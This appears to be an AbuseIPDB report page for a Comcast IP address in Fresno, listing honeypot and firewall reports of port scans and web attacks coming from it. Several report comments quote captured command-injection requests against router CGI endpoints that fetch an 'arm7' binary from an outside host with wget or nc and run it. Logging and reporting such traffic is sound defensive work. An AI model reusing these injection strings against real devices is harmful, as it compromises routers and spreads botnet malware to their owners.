JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 76.127.66.57

76.127.66.57 was found in our database!

This IP was reported 28 times. Confidence of Abuse is 37%: ?

37%

ISP	Comcast Cable Communications, Inc.
Usage Type	Fixed Line ISP
ASN	AS7922
Hostname(s)	c-76-127-66-57.hsd1.ca.comcast.net
Domain Name	comcast.net
Country	🇺🇸 United States of America
City	Fresno, California

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 76.127.66.57

Whois 76.127.66.57

IP Abuse Reports for 76.127.66.57:

This IP address has been reported a total of 28 times from 22 distinct sources. 76.127.66.57 was first reported on December 6th 2025, and the most recent report was 6 days ago.

Recent Reports: We have received reports of abusive activity from this IP address within the last week. It is potentially still actively engaged in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇧🇷 ICS Labs	2026-05-28 19:30:27 (6 days ago)	ICS Labs identified 76.127.66.57 as a malicious indicator from threat intelligence.	DDoS Attack Hacking Exploited Host
🇺🇸 NXTwoThou	2026-04-24 09:01:09 (1 month ago)	/login.cgi%3Fcli=aa%20aa%27;wget%20http://37.48.254.120/arm7%20-O%20/tmp/arm7;chmod%20777%20/tmp/arm ... show more /login.cgi%3Fcli=aa%20aa%27;wget%20http://37.48.254.120/arm7%20-O%20/tmp/arm7;chmod%20777%20/tmp/arm7;/tmp/arm7%27$ show less	Web App Attack
🇺🇸 MPL	2026-04-24 07:37:27 (1 month ago)	tcp/52869 (2 or more attempts)	Port Scan
🇬🇧 PeravixGroup	2026-04-23 21:35:23 (1 month ago)	HoneyPot hit - Aaran.cloud \| Port Probe \| reconnaissance \| sh -c "cd /data/local/tmp; nc 37.48.254.1 ... show more HoneyPot hit - Aaran.cloud \| Port Probe \| reconnaissance \| sh -c "cd /data/local/tmp; nc 37.48.254.120 25565 > .system-update; chmod +x .system-update; (while show less	IoT Targeted Hacking
🇺🇸 MPL	2026-04-23 04:16:40 (1 month ago)	tcp/52869	Port Scan
🇬🇧 PeravixGroup	2026-04-23 02:27:23 (1 month ago)	HoneyPot hit - Aaran.cloud \| Rce Attempt \| command injection \| GET /ping.cgi?pingIpAddress=google.fr ... show more HoneyPot hit - Aaran.cloud \| Rce Attempt \| command injection \| GET /ping.cgi?pingIpAddress=google.fr;wget%20http://37.48.254.120/arm7%20-O%20/tmp/arm7;chmod%20777% show less	Web App Attack
Anonymous	2026-04-23 00:10:37 (1 month ago)	chmod%20777	Hacking Brute-Force Web App Attack
🇺🇸 xmission.com	2026-04-21 17:45:49 (1 month ago)	Blocked by UFW (TCP on 37215) Source port: 62668 TTL: 50 Packet length: 40 TOS: 0x00 This report (f ... show more Blocked by UFW (TCP on 37215) Source port: 62668 TTL: 50 Packet length: 40 TOS: 0x00 This report (for 76.127.66.57) was generated by: https://github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan
Anonymous	2026-04-20 14:13:24 (1 month ago)	D-Link.DSL-2750B.CLI.OS.Command.Injection	Exploited Host
🇩🇪 HoneyPot-FrPri	2026-04-20 00:50:17 (1 month ago)	76.127.66.57 - - [20/Apr/2026:02:50:16 +0200] "GET /ping.cgi?pingIpAddress=google.fr;wget%20http://3 ... show more 76.127.66.57 - - [20/Apr/2026:02:50:16 +0200] "GET /ping.cgi?pingIpAddress=google.fr;wget%20http://37.48.254.120/arm7%20-O%20/tmp/arm7;chmod%20777%20/tmp/arm7;/tmp/arm7%27/&sessionKey=1039 HTTP/1.1" 4 ... show less	Bad Web Bot Web App Attack
🇹🇭 Sawasdee	2026-04-19 22:00:08 (1 month ago)	Unwanted checking 80 or 443 port ...	Bad Web Bot
🇮🇪 RoboSOC	2026-04-18 21:52:13 (1 month ago)	Comtrend VR-3033 Remote Command Execution Vulnerability, PTR: c-76-127-66-57.hsd1.ca.comcast.net.	Hacking
🇩🇪 EGP Abuse Dept	2026-04-18 14:20:38 (1 month ago)	Scanning for web/db/file exploits on tpc-027.mach3builders.nl	SQL Injection Bad Web Bot Web App Attack
🇫🇷 Hiigara	2026-04-18 11:00:53 (1 month ago)	connection attempt : 76.127.66.57 on port : tcp/8080 (HTTP-alt)	Port Scan
🇺🇸 gu-alvareza	2026-04-18 07:07:49 (1 month ago)	D-Link.DSL-2750B.CLI.OS.Command.Injection	SQL Injection Web App Attack

Showing 1 to 15 of 28 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇺🇿 213.230.127.104

🇸🇬 194.164.107.4

🇺🇸 162.216.150.190

🇮🇩 103.191.14.243

🇺🇸 44.250.252.185

🇳🇱 193.176.31.150

🇺🇸 149.36.48.88

🇨🇳 111.9.22.102

🇨🇳 101.206.107.245

🇷🇺 85.94.0.157

🇸🇬 47.84.196.143

🇧🇷 45.233.218.160

🇨🇳 36.111.150.151

🇺🇸 20.64.104.65

🇺🇸 207.241.173.57

🇺🇸 199.231.163.19

🇺🇸 167.172.131.35

🇩🇰 85.203.47.154

🇩🇰 85.203.47.114

🇬🇧 81.19.219.227